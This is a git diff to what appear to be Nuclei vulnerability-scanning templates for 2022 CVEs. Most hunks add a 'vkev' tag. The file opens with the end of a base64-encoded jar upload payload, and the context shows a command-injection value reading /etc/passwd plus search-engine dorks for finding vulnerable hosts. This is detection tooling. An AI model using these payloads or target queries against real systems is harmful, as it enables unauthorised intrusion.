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')}}" diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml index 6374d6a59fd..c2dfe4cf090 100644 --- a/http/cves/2022/CVE-2022-25369.yaml +++ b/http/cves/2022/CVE-2022-25369.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Dynamicweb" - tags: cve2022,cve,dynamicweb,rce,unauth + tags: cve2022,cve,dynamicweb,rce,unauth,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index c21a837b6e6..c759ce64c1e 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,cuppacms + tags: cve,cve2022,lfi,cuppa,cuppacms,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index b7181c09cc3..39d5e1ec583 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,cuppacms + tags: cve,cve2022,lfi,cuppa,cuppacms,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 7c9d7b668cb..b63b8b5a53c 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: thedigitalcraft product: atomcms - tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload + tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload,vkev variables: string: "CVE-2022-25487" diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index b5df64d51ad..6a5b49af035 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,sqli,atom,cms,thedigitalcraft + tags: cve,cve2022,sqli,atom,cms,thedigitalcraft,vkev variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 41aa00866f8..db299edb550 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -32,7 +32,7 @@ info: google-query: - inurl:/backups-dup-lite/dup-installer/ - inurl:"/wp-content/plugins/duplicator" - tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek + tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index e496b458eb6..a55bfd142bb 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -33,7 +33,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian + tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 5e5e75e96d2..9fce545cf8f 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" - tags: cve2022,cve,confluence,atlassian,default-login,kev + tags: cve2022,cve,confluence,atlassian,default-login,kev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 01d37b037b2..159a051b0b8 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" - tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive + tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 5cbffc48d93..8441f87f3a1 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: openautomationsoftware product: oas_platform - tags: cve2022,cve,oas,oss,unauth,openautomationsoftware + tags: cve2022,cve,oas,oss,unauth,openautomationsoftware,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 5dfd1eb48c2..c7c26d10c2b 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"qnap" - intitle:"photo station" - tags: cve2022,cve,qnap,lfi,kev + tags: cve2022,cve,qnap,lfi,kev,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 3bad733b710..4fc5ab4b636 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -36,7 +36,7 @@ info: - app="zimbra-邮件系统" - icon_hash="475145467" - icon_hash="1624375939" - tags: cve,cve2022,zimbra,xss,kev + tags: cve,cve2022,zimbra,xss,kev,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 5f7f2a6082d..546e73a53ca 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: college_management_system_project product: college_management_system - tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project + tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project,vkev variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 94778ae8a13..7950c376fa4 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -36,7 +36,7 @@ info: - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" - tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp + tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp,vkev http: - method: POST diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index 417a98641eb..ee1eef9a303 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -35,7 +35,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware + tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index eec986533e2..fd608303af3 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -35,7 +35,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware + tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 9c56a2cb8f3..c51c3d24cc2 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: phpgurukul product: dairy_farm_shop_management_system - tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul + tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index fec441bca41..5b4025834c2 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -21,7 +21,7 @@ info: max-request: 1 vendor: razer product: sila - tags: packetstorm,cve,cve2022,razer,sila,router + tags: packetstorm,cve,cve2022,razer,sila,router,vkev http: - method: POST diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index b3565a7a77c..ff97af26183 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: razer product: sila_firmware - tags: cve,cve2022,edb,packetstorm,razer,lfi,router + tags: cve,cve2022,edb,packetstorm,razer,lfi,router,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 0f583a2529c..ca64ae29479 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -29,7 +29,7 @@ info: vendor: ejs product: ejs framework: node.js - tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js + tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 058ba7ef5fa..870bc416738 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -34,7 +34,7 @@ info: - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" - tags: cve,cve2022,consul,hashicorp,ssrf,intrusive + tags: cve,cve2022,consul,hashicorp,ssrf,intrusive,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 9757f1ed49a..57996559a26 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -33,7 +33,7 @@ info: - http.html:"SolarView Compact" - http.html:"solarview compact" fofa-query: body="solarview compact" - tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec,vkev variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index a344b0db4a2..a6fcdb305b3 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: netgear product: ssl312_firmware - tags: cve2022,cve,sqli,netgear,router + tags: cve2022,cve,sqli,netgear,router,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index c77e1cc4da7..82c9fa55822 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev + tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 5ec714c6601..4250272ba0d 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -31,7 +31,7 @@ info: shodan-query: - title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - http.title:"usg flex 100","usg flex 100w","usg flex 200","usg flex 500","usg flex 700","usg flex 50","usg flex 50w","atp100","atp200","atp500","atp700" - tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce + tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index a2f5534fa96..4efb21911fe 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -29,7 +29,7 @@ info: product: roxy-wi shodan-query: html:"Roxy-WI" fofa-query: body="roxy-wi" - tags: cve2022,cve,rce,roxy,roxy-wi + tags: cve2022,cve,rce,roxy,roxy-wi,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-31137.yaml b/http/cves/2022/CVE-2022-31137.yaml index c4e1ba9783e..abe5e8ece27 100644 --- a/http/cves/2022/CVE-2022-31137.yaml +++ b/http/cves/2022/CVE-2022-31137.yaml @@ -32,7 +32,7 @@ info: - http.html:"Roxy-WI" - http.html:"roxy-wi" fofa-query: body="roxy-wi" - tags: cve2022,cve,rce,roxy,roxy-wi + tags: cve2022,cve,rce,roxy,roxy-wi,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-31161.yaml b/http/cves/2022/CVE-2022-31161.yaml index 6e519d3327e..495becf89e6 100644 --- a/http/cves/2022/CVE-2022-31161.yaml +++ b/http/cves/2022/CVE-2022-31161.yaml @@ -29,7 +29,7 @@ info: product: roxy-wi shodan-query: html:"Roxy-WI" fofa-query: body="roxy-wi" - tags: cve2022,cve,rce,roxy,roxy-wi + tags: cve2022,cve,rce,roxy,roxy-wi,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-3124.yaml b/http/cves/2022/CVE-2022-3124.yaml index 606b4419dba..9842f83bffc 100644 --- a/http/cves/2022/CVE-2022-3124.yaml +++ b/http/cves/2022/CVE-2022-3124.yaml @@ -24,7 +24,7 @@ info: product: frontend_file_manager framework: wordpress publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/" - tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive + tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive,vkev variables: rand_string: '{{to_lower(rand_text_alpha(6))}}' diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 8e62d4c2576..191911930ea 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -27,7 +27,7 @@ info: vendor: ithemes product: backupbuddy framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes + tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index e5564690f2f..63ccbbf596a 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"linear emerge" - intitle:"emerge" - tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol + tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 681ab728a11..9e6da95b138 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -33,7 +33,7 @@ info: fofa-query: - icon_hash=-1250474341 - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" - tags: cve2022,cve,vmware,lfi + tags: cve2022,cve,vmware,lfi,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index 187aa4d3bc1..46ef01ee615 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -30,7 +30,7 @@ info: vendor: netgate product: pfblockerng framework: pfsense - tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate + tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index cf6ae1d5990..71e68931330 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -32,7 +32,7 @@ info: - http.html:"Wavlink" - http.html:"wavlink" fofa-query: body="wavlink" - tags: cve,cve2022,wavlink,exposure + tags: cve,cve2022,wavlink,exposure,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 3053319a1c5..6315c171196 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project,vkev variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index e893f3684db..f13fda3a374 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -30,7 +30,7 @@ info: product: i3geo shodan-query: http.html:"i3geo" fofa-query: body="i3geo" - tags: cve2022,cve,i3geo,lfi,softwarepublico + tags: cve2022,cve,i3geo,lfi,softwarepublico,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index dd162230afd..b9ecf454a6b 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -37,7 +37,7 @@ info: - body="/apps/imt/html/" - title="spark master at" google-query: intitle:"spark master at" - tags: cve2022,cve,apache,spark,kev,packetstorm + tags: cve2022,cve,apache,spark,kev,packetstorm,vkev variables: command: "echo CVE-2022-33891 | rev" 